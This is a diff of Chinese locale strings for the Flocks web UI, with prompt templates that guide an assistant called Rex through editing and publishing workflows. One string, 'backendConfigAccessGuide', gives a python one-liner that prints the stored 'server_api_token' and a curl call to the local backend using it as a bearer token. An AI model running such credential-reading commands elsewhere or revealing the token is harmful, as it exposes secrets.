+      "guidePanelDesc": "选择一个引导或案例，Rex 会加载 tool-builder skill，确认工具输入输出、实现方式和冒烟测试后生成本地 Python 工具。",
+      "guideSectionTitle": "创建引导",
+      "caseSectionTitle": "创建案例",
+      "guideActions": [
+        {
+          "label": "如何创建本地工具",
+          "description": "从工具名、参数 schema、返回格式、权限和测试样例开始。",
+          "prompt": "请按 .flocks/plugins/skills/tool-builder skill 引导我创建一个 Flocks 本地 Python 工具。先不要写文件，先用 question 工具一次只问一个最关键问题，确认工具名称、功能、输入参数 schema、返回格式、是否需要文件/命令/网络访问、错误处理和冒烟测试；我确认后再生成 ~/.flocks/plugins/tools/python/ 下的工具文件。"
+        },
+        {
+          "label": "设计输入输出",
+          "description": "把自然语言需求转换成明确参数、类型和返回 JSON。",
+          "prompt": "请帮我设计本地工具的输入输出。请先确认使用者、输入字段、字段类型、必填项、默认值、返回 JSON 结构、错误对象和一条最小测试样例；确认前不要写文件。"
+        },
+        {
+          "label": "规划测试样例",
+          "description": "生成最小可用样例、边界样例和失败样例。",
+          "prompt": "请按 tool-builder skill 帮我规划本地工具的测试样例。请先确认正常输入、边界输入、错误输入、预期输出和执行方式；写文件前先给出测试计划。"
+        }
+      ],
+      "caseActions": [
+        {
+          "label": "文本解析工具",
+          "description": "从日志、告警文本或报告中提取结构化字段。",
+          "prompt": "我想创建一个文本解析本地工具，用于从日志、告警文本或报告中提取结构化字段。请按 tool-builder skill 引导我确认输入格式、字段 schema、解析规则和测试样例。"
+        },
+        {
+          "label": "JSON 转换工具",
+          "description": "清洗、重命名或合并 JSON 字段。",
+          "prompt": "我想创建一个 JSON 转换本地工具，用于清洗、重命名、合并或规范化 JSON 字段。请按 tool-builder skill 引导我确认输入输出 schema、转换规则和测试样例。"
+        },
+        {
+          "label": "报告生成工具",
+          "description": "把结构化数据生成 Markdown 或摘要报告。",
+          "prompt": "我想创建一个报告生成本地工具，用于把结构化分析结果转换成 Markdown 摘要报告。请按 tool-builder skill 引导我确认输入字段、报告模板、输出格式和冒烟测试。"
+        }
+      ]
+    }
+  },
+
   "addMCP": {
     "title": "添加 MCP 服务",
     "subtitle": "通过表单或对话配置并添加 MCP 服务",
@@ -494,9 +620,9 @@
     "toolCountLabel": "工具数",
     "resourceCountLabel": "资源数",
     "generateIntro": "通过 AI 对话生成工具",
-    "generateDesc": "切换到「AI 编辑」标签页，描述你需要的工具，Rex 将自动生成 Python 工具代码并完成接入。",
+    "generateDesc": "切换到「工作台」标签页，描述你需要的工具，Rex 将自动生成 Python 工具代码并完成接入。",
     "doneLabel": "完成",
-    "mcpHintDesc": "不确定怎么填？切换到「AI 编辑」标签页，告诉 Rex 你想接入什么 MCP 服务，它会帮你自动完成配置。",
+    "mcpHintDesc": "不确定怎么填？切换到「工作台」标签页，告诉 Rex 你想接入什么 MCP 服务，它会帮你自动完成配置。",
     "connSuccess": "连接成功",
     "connFailed": "连接失败",
     "addFailedTitle": "添加失败"
diff --git a/webui/src/locales/zh-CN/update.json b/webui/src/locales/zh-CN/update.json
index cbd343a19..8ebca06ca 100644
--- a/webui/src/locales/zh-CN/update.json
+++ b/webui/src/locales/zh-CN/update.json
@@ -21,7 +21,8 @@
   "waitingRestart": "等待重启...",
   "checkFailed": "检查版本失败",
   "upgradeFailed": "升级失败",
-  "restartTimeout": "服务重启超时，请手动刷新页面",
+  "restartTimeout": "服务恢复确认超时：{{reason}}。请手动刷新页面确认状态。",
+  "restartUnknown": "未收到明确的健康检查结果",
   "dismissAction": "不再提醒",
   "dockerModeTitle": "Docker 部署",
   "dockerModeDesc": "当前通过 Docker 运行 Flocks，暂不支持页面内原地升级。请拉取最新镜像并重启容器完成升级。",
diff --git a/webui/src/locales/zh-CN/workflow.json b/webui/src/locales/zh-CN/workflow.json
index 029008d6f..1fa408bb4 100644
--- a/webui/src/locales/zh-CN/workflow.json
+++ b/webui/src/locales/zh-CN/workflow.json
@@ -38,19 +38,69 @@
     "notFound": "工作流不存在",
     "backToList": "返回列表",
     "resetLayout": "重置布局",
-    "downloadMd": "下载 MD",
-    "downloadMdTitle": "下载 MD 文件",
-    "downloadJson": "下载 JSON",
-    "downloadJsonTitle": "下载 JSON 文件",
+    "flocksHelp": "让Rex帮你配置、编辑工作流",
+    "flocksHelpTitle": "让Rex帮你配置、编辑工作流",
+    "downloadMd": "下载说明文件",
+    "downloadMdTitle": "下载当前说明文件",
+    "downloadJson": "下载工作流文件",
+    "downloadJsonTitle": "下载工作流文件",
     "dragAdjust": "拖动调整面板宽度",
     "exportFailed": "导出失败",
-    "noMdDesc": "暂无 MD 描述文件",
-    "noMdDescHint": "在右侧对话中描述需求，AI 将自动生成",
-    "mdUpdatedHint": "AI 已更新流程描述，请查看 MD 文档确认需求，然后在右侧对话中给出修改意见。",
+    "noMdDesc": "暂无 workflow.md",
+    "noMdDescHint": "生成一份面向人和 Flocks 都友好的 workflow.md",
+    "mdUpdatedHint": "AI 已更新 workflow.md，左侧已显示差异，请查看后继续在右侧对话中反馈。",
+    "editDocTitle": "workflow.md",
+    "editDocUnsaved": "未保存",
+    "editDocModeEdit": "编辑",
+    "editDocModePreview": "预览",
+    "editDocDiffTitle": "AI 修改差异",
+    "editDocDiffReviewDesc": "AI 已把修改写入 workflow.md。接受会保留当前内容；拒绝会回滚到修改前内容。",
+    "editDocDiffHunkTitle": "变更 {{index}}",
+    "editDocDiffAdded": "新增",
+    "editDocDiffRemoved": "删除",
+    "editDocDiffAccept": "接受",
+    "editDocDiffReject": "拒绝",
+    "editDocDiffAcceptHunk": "接受此段",
+    "editDocDiffRejectHunk": "拒绝此段",
+    "editDocDiffRejecting": "回滚中",
+    "editDocDiffAcceptSuccess": "已接受 AI 修改",
+    "editDocDiffAcceptHunkSuccess": "已接受此段修改",
+    "editDocDiffRejectSuccess": "已拒绝 AI 修改并回滚 workflow.md",
+    "editDocDiffRejectFailed": "拒绝 AI 修改失败",
+    "editDocDiffRejectHunkSuccess": "已拒绝此段修改并更新 workflow.md",
+    "editDocDiffRejectHunkFailed": "拒绝此段修改失败",
+    "editDocDiffEmpty": "没有检测到文本差异",
+    "editDocSave": "保存",
+    "editDocSaving": "保存中",
+    "editDocSaveSuccess": "workflow.md 已保存",
+    "editDocSaveFailed": "保存 workflow.md 失败",
+    "generateEditDoc": "生成说明",
+    "regenerateEditDoc": "重置文档",
+    "generateEditDocTitle": "让 Rex 按 workflow-builder skill 生成 workflow.md 说明文件",
+    "regenerateEditDocTitle": "重置当前 workflow.md 文档",
+    "generateWorkflow": "生成工作流",
+    "generateWorkflowTitle": "让右侧工作台基于当前 workflow.md 生成或更新 workflow.json",
+    "regenerateWorkflowConfirmTitle": "生成工作流？",
+    "regenerateWorkflowConfirmDesc": "workflow.md 已保存，是否立即基于当前内容生成或更新 workflow.json？",
+    "regenerateWorkflowConfirmYes": "生成",
+    "regenerateWorkflowConfirmNo": "拒绝",
+    "editDocEmpty": "暂无 workflow.md",
+    "editDocEmptyHint": "根据当前流程图和节点说明生成一份结构化、可编辑、可用于生成工作流的 workflow.md。",
+    "editDocPlaceholder": "在这里编辑 workflow.md...",
+    "editDocTextareaLabel": "编辑 workflow.md",
+    "generateEditDocPrompt": "这是用户点击「生成说明」触发的新任务。按钮含义是：先按 workflow-builder skill 生成或补齐当前工作流的 workflow.md 说明文件；此任务不是生成 workflow.json，除非我后续明确要求，不要修改 workflow.json。\n\n工作流名称：{{name}}\n工作流目录：{{dir}}\nMD 文件：{{mdPath}}\nJSON 定义文件：{{jsonPath}}\n\n当前情况：存在 workflow.json，但 workflow.md 不存在或左侧说明为空。进入工作台后必须先生成 workflow.md。\n\n请按下面流程推进：\n1. 先加载并遵守 workflow-builder skill。\n2. 必须使用 question 工具询问我需要中文流程说明文档还是英文流程说明文档；一次只问一个问题，必须允许自定义输入。\n3. 读取现有 workflow.json 和相关工作流文件，结合下面的 workflow.json 内容理解已有节点、输入、输出、触发器和执行逻辑。\n4. 参考 workflow-builder skill 中的 workflow_zh.md / workflow_en.md 模板结构，只生成一份 workflow.md。\n5. workflow.md 要面向人编辑：说明功能、适用场景、输入输出、节点流程、可修改点、样例和验收方式；不要写得像机器 JSON 说明。\n6. 写入 workflow.md 前先展示 diff 并等待我确认；确认后再写入 {{mdPath}}。\n7. 完成后说明 workflow.md 已如何生成，以及下一步可以点击「生成工作流」基于 workflow.md 更新 workflow.json。\n\n当前 workflow.json：\n~~~json\n{{workflowJson}}\n~~~",
+    "generateWorkflowPrompt": "这是用户点击「生成工作流」按钮触发的新任务。按钮含义是：基于当前 workflow.md 生成或更新机器可执行的 workflow.json；除非我明确要求，请不要重新生成或重写 workflow.md。\n\n工作流名称：{{name}}\n工作流目录：{{dir}}\nMD 文件：{{mdPath}}\nJSON 定义文件：{{jsonPath}}\n\n请按下面流程推进：\n1. 先加载 workflow-builder skill。\n2. 读取现有 workflow.md 和 workflow.json，结合当前流程图结构理解已有实现。\n3. 以当前编辑器中的 workflow.md 内容作为主要意图来源；如果磁盘上的 workflow.md 与下面内容不同，以下面的内容为准。\n4. 只生成/更新 workflow.json，保留现有工作流中仍然合理的触发器、样例输入和元数据。\n5. 先给出简短生成计划；需要写 workflow.json 时，先展示 diff 并等待我确认。\n6. 生成后的 workflow.json 必须是合法 JSON，节点和边必须能组成完整流程图。\n7. 完成后说明 workflow.json 改了什么，以及我应该如何测试。\n\n当前编辑器中的 workflow.md 内容：\n~~~markdown\n{{editDocContent}}\n~~~",
     "canvasTabs": {
       "flow": "流程图",
-      "md": "MD 描述",
-      "json": "JSON"
+      "md": "流程说明",
+      "json": "工作流文件"
+    },
+    "flowControls": {
+      "zoomIn": "放大",
+      "zoomOut": "缩小",
+      "fitView": "适应视图",
+      "collapse": "折叠画布工具",
+      "expand": "展开画布工具"
     },
     "topBar": {
       "collapsePanel": "收起面板",
@@ -68,9 +118,8 @@
     },
     "rightPanel": {
       "tabOverview": "概览",
-      "tabChat": "AI 编辑",
-      "tabRun": "运行",
-      "tabIntegration": "集成",
+      "tabChat": "工作台",
+      "tabIntegration": "发布",
       "renderError": "组件渲染出错",
       "deleteWorkflow": "删除工作流",
       "deleteConfirmTitle": "删除工作流",
@@ -80,7 +129,8 @@
       "deleting": "删除中..."
     },
     "overview": {
-      "configInfo": "配置信息",
+      "configInfo": "信息",
+      "workflowInfo": "基本信息",
       "nodeCount": "节点数",
       "nodesAndEdges": "{{nodes}} 个节点 / {{edges}} 条边",
       "category": "分类",
@@ -88,6 +138,10 @@
       "createdBy": "创建人",
       "createdAt": "创建时间",
       "updatedAt": "更新时间",
+      "workflowFiles": "工作流文件",
+      "fileDir": "文件目录",
+      "notGenerated": "（尚未生成）",
+      "run": "运行",
       "runStats": "运行统计",
       "totalCalls": "总调用次数",
       "successRate": "成功率",
@@ -184,8 +238,10 @@
       "nodeLabel": "{{type}} 节点"
     },
     "run": {
-      "testSection": "测试",
+      "testSection": "测试运行",
       "inputParams": "输入参数（JSON）",
+      "testSummaryIdle": "输入参数已准备，可直接测试运行",
+      "triggerSection": "触发能力",
       "rootObjectRequired": "输入参数必须是 JSON 对象",
       "running": "运行中...",
       "testRun": "测试运行",
@@ -206,14 +262,46 @@
       "curlExample": "调用示例（curl）",
       "stopping": "停止中...",
       "stopService": "停止服务",
+      "deleteService": "删除 API 发布配置",
+      "deleteServiceShort": "删除配置",
+      "deletingService": "删除中...",
+      "deleteServiceConfirm": "确定要删除这个 API 发布配置吗？如果服务仍在运行，将会先停止服务。",
+      "deleteServiceFailed": "删除 API 发布配置失败",
       "publishDesc": "将工作流发布为独立的 API 服务，生成专属调用地址和 API Key。",
       "publishing": "发布中，请稍候...",
       "publishAsApi": "发布为 API 服务",
+      "guidePanelTitle": "Rex 辅助发布",
+      "guidePanelDesc": "选择一种发布方式，Rex 会先读取 guide.md 和配置库，再引导你确认、应用或启动。",
+      "cardGuideTitle": "Flocks辅助配置",
+      "cardGuideAction": "辅助配置",
+      "cardGuideApiFocus": "API 发布配置",
+      "cardGuideApiDesc": "结合当前 API 服务状态、运行方式和工作流功能，引导确认发布、鉴权、调用样例和是否启动。",
+      "cardGuideTriggerDesc": "结合当前 {{trigger}} 卡片配置和工作流功能，引导确认接入参数、字段映射、样例和生效方式。",
+      "cardGuideDisplayLabel": "Flocks辅助配置：{{focus}}",
+      "guideApiShort": "发布为 API",
+      "guideApiDesc": "让 Rex 引导确认 API 模板、运行驱动、认证、调用路径和是否启动服务。",
+      "guideApiInstruction": "用户从发布页点击了 API 发布引导。请围绕“发布为 API”的发布配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 让后端迁移 config.json 兜底模板。config.json 和 workflow.json 中的发布/触发配置只可作为模板来源，不是直接写入目标，也不是已生效状态。需要变更模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要真正启动/停止 API 服务，模板确认后再走 {{publishEndpoint}} / {{unpublishEndpoint}}，不要通过改模板字段冒充运行态发布。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未发布，不要继续询问要对 workflow.json 模板做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideSyslogShort": "Syslog 接入",
+      "guideSyslogDesc": "让 Rex 引导确认 Syslog 触发模板、端口协议、字段映射和监听启停。",
+      "guideSyslogInstruction": "用户从发布页点击了 Syslog 接入引导。请围绕 Syslog 触发/监听配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整 Syslog 触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要启动/停止监听，使用对应运行态接口，不要通过修改模板 enabled 字段冒充监听状态。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未启动，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideKafkaShort": "Kafka 接入",
+      "guideKafkaDesc": "让 Rex 引导确认 Kafka 触发模板、broker、topic、group、输入映射和启停。",
+      "guideKafkaInstruction": "用户从发布页点击了 Kafka 接入引导。请围绕 Kafka 触发/消费配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整 Kafka 触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要启动/停止消费，使用对应运行态接口，不要通过修改模板 enabled 字段冒充消费状态。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未启动，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideScheduleShort": "定时触发",
+      "guideScheduleDesc": "让 Rex 引导确认定时触发模板、周期、输入参数、超时和启停。",
+      "guideScheduleInstruction": "用户从发布页点击了定时触发引导。请围绕 Schedule/Workflow Poller 配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整定时触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。如果用户要启动/停止轮询，使用对应运行态接口，不要通过修改模板 enabled 字段冒充运行状态。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未启动，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideWebhookShort": "Webhook 接入",
+      "guideWebhookDesc": "让 Rex 引导确认 Webhook 触发模板、路径、方法、认证、映射和样例。",
+      "guideWebhookInstruction": "用户从发布页点击了 Webhook 接入引导。请围绕 Webhook 发布/接入配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的 Webhook 触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整 Webhook 触发模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用，不要继续询问要对 workflow.json 模板 Webhook 触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
+      "guideAdapterShort": "自定义接入",
+      "guideAdapterDesc": "让 Rex 引导确认自定义接入模板、适配器、输入输出契约和验证方式。",
+      "guideAdapterInstruction": "用户从发布页点击了自定义接入引导。请围绕自定义 Trigger/Adapter 配置读取 guide.md，并先通过 GET {{configEndpoint}} 读取后端配置库；如果库里没有模板，可使用 {{configSyncEndpoint}} 迁移 config.json 兜底模板。config.json 和 workflow.json 中的触发器只可作为模板来源，不是直接写入目标，也不是已生效状态。需要新增或调整自定义接入模板时，先展示相对后端配置的 diff，再用 question 工具确认；确认后 PUT 完整配置到 {{configEndpoint}}。接口不可用时必须停止配置流程，明确说明无法读取/写入后端配置库、未应用，不要继续询问要对 workflow.json 模板触发器做什么；后端恢复后再读取配置库并应用。一次只问一个最关键问题。",
       "dockerStarting": "正在启动 Docker 容器，可能需要 1-2 分钟...",
       "localStarting": "正在启动本地 API 服务...",
       "serviceDriver": "运行方式",
       "driverLocal": "本地进程",
       "driverDocker": "Docker 容器",
+      "applyDriver": "应用运行方式",
       "recommended": "推荐",
       "driverLocalDesc": "优先推荐，启动更快，适合本机开发和调试",
       "driverDockerDesc": "隔离运行，适合验证容器化部署",
@@ -270,6 +358,8 @@
       "syslogPortError": "端口范围无效，请输入 1 ~ 65535 之间的整数",
       "syslogActive": "监听中",
       "historySection": "执行历史",
+      "historySummary": "{{count}} 条记录 · 最近 {{time}}",
+      "historySummaryLoading": "正在加载执行历史",
       "noHistory": "暂无执行记录",
       "noOutput": "无输出数据",
       "stepsCompleted": "步已完成",
@@ -282,21 +372,74 @@
       "currentLabel": "当前",
       "inputPlaceholder": "描述你想对工作流做的修改... (Enter 发送)",
       "sessionTitle": "修改工作流「{{name}}」",
-      "contextMessage": "你是一个工作流专家助手，正在帮助用户修改 Flocks 工作流。请根据用户的需求修改工作流文件。\n\n工作流名称： {{name}}\n分类： {{category}}\n工作流目录： {{dir}}\n\n文件路径：\n- MD 描述文件：{{mdPath}}\n- JSON 定义文件：{{jsonPath}}\n\n请先加载 workflow-builder skill，完成工作流的修改。",
+      "backendConfigAccessGuide": "后端配置库认证方式：直接 curl 访问 GET {{configEndpoint}} 会返回 401 AuthError；读取/写入必须使用 Flocks 后端 API token `server_api_token`，它存于 `flocks.security.get_secret_manager()`。它不是浏览器 cookie，也不是 `flocks.json` 里 `api_services` 下的 `apiKey`（那些是外部平台凭证）。后端服务端口是 8000，前端 WebUI 5173 只通过 Vite proxy 转发。获取 token 命令：`python3 -c \"from flocks.security import get_secret_manager; print(get_secret_manager().get('server_api_token'))\"`。读取配置命令：`curl -H \"Authorization: Bearer $(python3 -c 'from flocks.security import get_secret_manager; print(get_secret_manager().get(\"server_api_token\"))')\" \"http://127.0.0.1:8000{{configEndpoint}}\"`。写入配置用 `PUT {{configEndpoint}}`；迁移兜底模板用 `POST {{configSyncEndpoint}}`。相关文件：`flocks/security.py`、`flocks/server/auth.py`、`flocks/cli/main.py`、`webui/src/config/apiProxy.ts`。",
+      "contextMessage": "你是一个工作流专家助手，正在帮助用户修改或配置 Flocks 工作流。请根据用户的需求选择合适的 skill 和文件操作。\n\n工作流 ID： {{id}}\n工作流名称： {{name}}\n分类： {{category}}\n工作流目录： {{dir}}\n\n文件路径：\n- 工作流说明文件：{{mdPath}}\n- 工作流配置引导文件：{{guidePath}}\n- JSON 定义文件：{{jsonPath}}\n\n配置接口：\n- 配置模板读取/写入：GET/PUT {{configEndpoint}}\n- 兜底模板迁移：POST {{configSyncEndpoint}}\n- API 服务启停：POST {{publishEndpoint}} / {{unpublishEndpoint}}\n- 触发器模板管理：{{triggersEndpoint}}\n\n前端当前 API 清单：\n{{apiEndpoints}}\n\nSkill 选择规则：\n- 修改、重新生成或创建工作流文件时，请先加载 workflow-builder skill，并以 workflow.md 作为主要意图来源。\n- 当用户要求 Flocks 帮助、智能配置、检查配置、发布/集成配置或样例验证时，可以加载 skill_load(name=\"{{configSkillName}}\") 获取交互协议，但必须优先读取并遵循当前工作流目录里的 guide.md；不要用通用 skill 或 skill references 替代 guide.md 里的工作流细节。\n\n智能配置向导规则：\n- 配置开始前必须先读取 {{guidePath}}。如果该文件不存在或内容不足，先说明缺失，并用 question 工具询问是否根据 workflow.md/config.json 生成 guide.md；不要凭通用模板猜测配置细节。\n- 发布、接入、触发配置必须优先读取后端配置库：GET {{configEndpoint}}。如果库里没有模板，再用 POST {{configSyncEndpoint}} 迁移 workflow 目录下的 config.json；config.json 和 workflow.json 中的 triggers 只是导入/兜底模板，不是直接写入目标，也不能用来判断配置已生效。\n- 需要修改发布/接入/触发模板时，必须先展示相对后端配置的 diff，并通过 question 工具确认；确认后 PUT 完整配置对象到 {{configEndpoint}}。不要直接修改 workflow-local config.json 或 workflow.json 来表示配置已生效。\n- 发布、启动、停止、启用、停用是运行态动作，必须走前端当前 API 清单里的运行态接口（如 {{publishEndpoint}}、{{unpublishEndpoint}}、{{triggersEndpoint}} 或具体类型接口），不要通过改模板 enabled 字段冒充运行态状态。\n- 如果后端配置接口不可用，必须停止配置流程，明确说明无法读取/写入后端配置库、未应用、未发布、未启动；不要追问用户要对 workflow.json 里的模板触发器做什么，不要说用户需要在 WebUI 上发布来替代本次应用结果。\n- 引导必须傻瓜式：需要用户选择、补充、确认或审批 diff 时，必须调用 question 工具，不要在普通回复里写问题；一次只发一个问题卡片，默认推荐选项优先，并提供自定义/补充输入（没有则填 none）。\n- 不要在聊天中索要或暴露明文密钥；需要密钥时使用系统的密钥管理方式。\n- 优先帮助用户完成：理解当前配置、补齐关键选择、准备一条样例、验证输入输出、再生成最终说明。",
       "welcome": {
         "title": "工作流「{{name}}」",
-        "descPart1": "描述你的修改需求，AI 将先更新 MD 描述文件，请对照左侧",
-        "mdTabLabel": "「MD 描述」",
-        "descPart2": "视图审查流程是否正确，确认后 AI 将同步更新 JSON 定义文件。",
-        "fileDir": "工作流文件目录",
-        "notGenerated": "（尚未生成）",
+        "descPart1": "你可以直接描述修改需求，也可以先用 Flocks 帮助梳理配置。需要改动时，AI 会先参考 workflow.md，请对照左侧",
+        "mdTabLabel": "「流程说明」",
+        "descPart2": "视图审查流程是否正确，确认后再同步 JSON 定义文件。",
+        "editPanelTitle": "Rex 辅助修改",
+        "editPanelDesc": "选择一个修改入口，Rex 会先读取当前工作流的 workflow.md 和 workflow.json，再引导你确认并修改「{{name}}」。",
+        "editSectionTitle": "辅助修改",
+        "configSectionTitle": "辅助配置",
+        "publishSectionTitle": "辅助发布",
+        "editRequirementShort": "修改功能需求",
+        "editRequirementDesc": "把你想改的功能目标整理成可同步到 workflow.md 的结构化需求。",
+        "editRequirementPrompt": "用户点击了「修改功能需求」按钮。请按 workflow-builder skill 帮我修改已有 Flocks 工作流的功能需求。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，先总结当前功能、输入输出、节点流程和已知限制；然后用 question 工具一次只问一个最关键问题，确认我要修改的目标、范围、输入输出变化、验收标准和是否影响发布/触发配置。未展示计划和 diff 并得到确认前不要写任何文件。",
+        "editNodeFunctionShort": "修改节点功能",
+        "editNodeFunctionDesc": "调整某个节点负责什么、处理逻辑、输入输出和判定规则。",
+        "editNodeFunctionPrompt": "用户点击了「修改节点功能」按钮。请按 workflow-builder skill 帮我修改已有 Flocks 工作流中某个节点的业务功能。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，列出当前节点功能摘要；然后用 question 工具确认要修改哪个节点、当前功能、目标功能、输入输出变化、验收标准、是否影响代码实现、上下游节点或发布配置。未确认前不要写文件；需要修改时，先更新 workflow.md 中对应节点的功能说明并展示 diff，确认后再同步 workflow.json。",
+        "editNodeShort": "编辑节点实现",
+        "editNodeDesc": "修改执行代码、字段映射、工具参数或上下游连接。",
+        "editNodePrompt": "用户点击了「编辑节点实现」按钮。请按 workflow-builder skill 帮我编辑已有 Flocks 工作流节点的实现细节。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，列出当前节点和边的简要结构；然后用 question 工具确认要修改哪个节点、执行逻辑、代码或工具参数、输入输出变化、是否影响上下游边关系和样例数据。修改前先给出计划和 diff，不要直接写文件。",
+        "editFlowShort": "调整流程结构",
+        "editFlowDesc": "新增、删除、移动节点，调整分支、循环、汇合和数据流转。",
+        "editFlowPrompt": "用户点击了「调整流程结构」按钮。请按 workflow-builder skill 帮我调整已有 Flocks 工作流结构。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，并输出当前 Mermaid 流程简图；然后用 question 工具确认要新增/删除/移动哪些节点、分支条件、循环或 join 逻辑、字段流转和样例影响。未确认前不要写文件；需要修改时先展示 workflow.md/workflow.json 的计划和 diff。",
+        "editRegenerateShort": "生成工作流",
+        "editRegenerateDesc": "基于当前 workflow.md 生成 workflow.json 或修复结构不一致。",
+        "editRegeneratePrompt": "用户点击了「生成工作流」按钮。这个按钮的意思是：请按 workflow-builder skill 基于当前 workflow.md 生成或修复这个 Flocks 工作流的 workflow.json。工作流 ID 是 {{id}}，工作流目录是 {{dir}}，MD 文件是 {{mdPath}}，JSON 文件是 {{dir}}workflow.json。第一步必须读取 workflow.md 和 workflow.json，比较人读意图与机器定义是否一致；目标是生成/更新 workflow.json，不要重新生成或重写 workflow.md；先给出简短生成计划，必要时用 question 工具确认范围；写 workflow.json 前必须展示 diff 并等待确认。",
+        "guideTitle": "Flocks 帮助已就绪",
+        "guideDesc": "点一下，我会先读取当前工作流的 guide.md，再带你做最关键的下一步。",
+        "guidePrimary": "开始智能配置",
+        "guideAudit": "检查当前配置",
+        "guideSample": "用样例验证",
+        "guidePrimaryShort": "帮我智能配置",
+        "guideAuditShort": "检查当前配置",
+        "guideSampleShort": "验证样例数据",
+        "guideInputModeShort": "配置输入方式",
+        "guideSourceShapeShort": "确认来源数据",
+        "guideOutputShort": "设置输出去向",
+        "guideFilterShort": "调整过滤规则",
+        "guideApplyShort": "应用配置方案",
+        "guidePrimaryDesc": "Flocks 辅助进行工作流的配置",
+        "guideAuditDesc": "检查已有配置和缺失项",
+        "guideSampleDesc": "用样例验证输入输出",
+        "guideInputModeDesc": "确认告警通过 API、Syslog、Kafka、Webhook、Schedule 还是文件进入",
+        "guideSourceShapeDesc": "确认来源产品、payload 格式和是否已有样例",
+        "guideOutputDesc": "确认结果写本地、返回 API、推送 Kafka/IM 或进入下游工作流",
+        "guideFilterDesc": "确认过滤、降噪、去重等业务默认行为",
+        "guideApplyDesc": "确认应用配置、保存草稿或暂不修改",
+        "guideInputModeInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“输入模式”的语义自动提取入口、触发器、默认推荐、限制和需要收集的信息，然后发一个 question 卡片。",
+        "guideSourceShapeInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“来源形态”的语义自动提取来源系统、payload、字段映射、样例状态和需要收集的信息，然后发一个 question 卡片。",
+        "guideOutputInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“输出去向”的语义自动提取输出契约、结果保存、下游去向、外部副作用和需要收集的信息，然后发一个 question 卡片。",
+        "guideFilterInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“过滤规则”的语义自动提取过滤、降噪、去重、阈值、默认规则和需要收集的信息，然后发一个 question 卡片。",
+        "guideSampleInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“样例验证”的语义自动提取样例格式、验证步骤、禁止副作用和需要收集的信息，然后发一个 question 卡片。",
+        "guideApplyInstruction": "请不要要求 guide.md 存在按钮表；读取全文后按“应用方式”的语义自动提取发布配置来源、生效方式、草稿/应用选项、验证规则和需要收集的信息。应用发布/接入/触发模板时必须以 GET/PUT {{configEndpoint}} 为准；config.json 只允许作为 {{configSyncEndpoint}} 的迁移兜底，不能直接写它来表示已生效。如需修改，必须先展示相对后端配置的 diff，再发一个 question 卡片。",
+        "guideCollapse": "收起引导",
+        "guideExpand": "展开引导",
+        "guideNote": "默认只引导，不直接改文件；需要改动时会先给你看 diff。",
